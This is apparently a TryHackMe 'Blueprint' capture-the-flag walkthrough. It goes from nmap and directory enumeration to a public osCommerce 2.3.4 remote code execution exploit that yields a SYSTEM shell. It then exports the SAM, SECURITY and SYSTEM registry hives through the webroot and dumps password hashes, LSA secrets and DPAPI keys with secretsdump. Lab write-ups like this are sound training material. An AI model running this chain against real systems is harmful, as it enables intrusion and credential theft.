TryHackMe Blueprint
nmap
nmap -sV 10.10.239.229
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 17:40 EST
Nmap scan report for 10.10.239.229
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc?
139/tcp open netbios-ssn?
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.94SVN%I=7%D=2/8%Time=65C5589E%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,5,"\x83\0\0\x01\x8f");
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.32 seconds
Web Exploitation
Port 80 is IIS 7.5, while 443 and 8080 run a separate Apache 2.4.23/PHP 5.6.28 stack (XAMPP, as the C:\xampp paths later confirm), so the Apache instance on 8080 is enumerated first.
feroxbuster -u http://10.10.239.229:8080 --silent
http://10.10.239.229:8080/oscommerce-2.3.4 => http://10.10.239.229:8080/oscommerce-2.3.4/
osCommerce 2.3.4 has a public unauthenticated RCE, https://www.exploit-db.com/exploits/50128: the script first checks that the web installer directory was never removed after setup, then injects a system command through it.
wget https://www.exploit-db.com/raw/50128
--2024-02-08 18:03:03-- https://www.exploit-db.com/raw/50128
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2501 (2.4K) [text/plain]
Saving to: ‘50128’
50128 100%[=============================================================================>] 2.44K --.-KB/s in 0s
2024-02-08 18:03:04 (18.8 MB/s) - ‘50128’ saved [2501/2501]
┌──(kali㉿kali)-[~]
└─$ mv 50128 oscommerceExploit.py
┌──(kali㉿kali)-[~]
└─$ python oscommerceExploit.py http://10.10.239.229:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$ reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
The operation completed successfully.
RCE_SHELL$ reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
The operation completed successfully.
RCE_SHELL$ reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save
The operation completed successfully.
Because the hives were saved under the osCommerce webroot (C:\xampp\htdocs\oscommerce-2.3.4), Apache on 8080 now serves them and they can be fetched with a plain HTTP GET. Anyone who can reach the site can fetch them as well, so delete them from the webroot once they have been copied.
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/sam.save
--2024-02-08 18:09:46-- http://10.10.239.229:8080/oscommerce-2.3.4/sam.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘sam.save’
sam.save 100%[============================================================================>] 24.00K 7.89KB/s in 3.0s
2024-02-08 18:09:49 (7.89 KB/s) - ‘sam.save’ saved [24576/24576]
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/security.save
--2024-02-08 18:09:55-- http://10.10.239.229:8080/oscommerce-2.3.4/security.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K)
Saving to: ‘security.save’
security.save 100%[============================================================================>] 24.00K 37.9KB/s in 0.6s
2024-02-08 18:09:56 (37.9 KB/s) - ‘security.save’ saved [24576/24576]
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.239.229:8080/oscommerce-2.3.4/system.save
--2024-02-08 18:10:01-- http://10.10.239.229:8080/oscommerce-2.3.4/system.save
Connecting to 10.10.239.229:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12795904 (12M)
Saving to: ‘system.save’
system.save 100%[============================================================================>] 12.20M 1.12MB/s in 13s
2024-02-08 18:10:15 (949 KB/s) - ‘system.save’ saved [12795904/12795904]
Hash Dumping
python /opt/impacket/examples/secretsdump.py -sam /home/kali/Downloads/sam.save -security /home/kali/Downloads/security.save -system /home/kali/Downloads/system.save LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x147a48de4a9815d2aa479598592b086f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):malware
[*] DPAPI_SYSTEM
dpapi_machinekey:0x9bd2f17b538da4076bf2ecff91dddfa93598c280
dpapi_userkey:0x251de677564f950bb643b8d7fdfafec784a730d1
[-] NTDSHashes.__init__() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...
The NTDSHashes error is most likely a version mismatch (the /opt/impacket/examples/secretsdump.py script is newer than the installed Impacket 0.10.0 library). It is raised only after the SAM hashes and LSA secrets have already been dumped, so with LOCAL hives it can be ignored.
admin
Note that the web shell already runs as NT AUTHORITY\SYSTEM because the XAMPP Apache service is running as SYSTEM, so no privilege escalation step is needed.
RCE_SHELL$ whoami
nt authority\system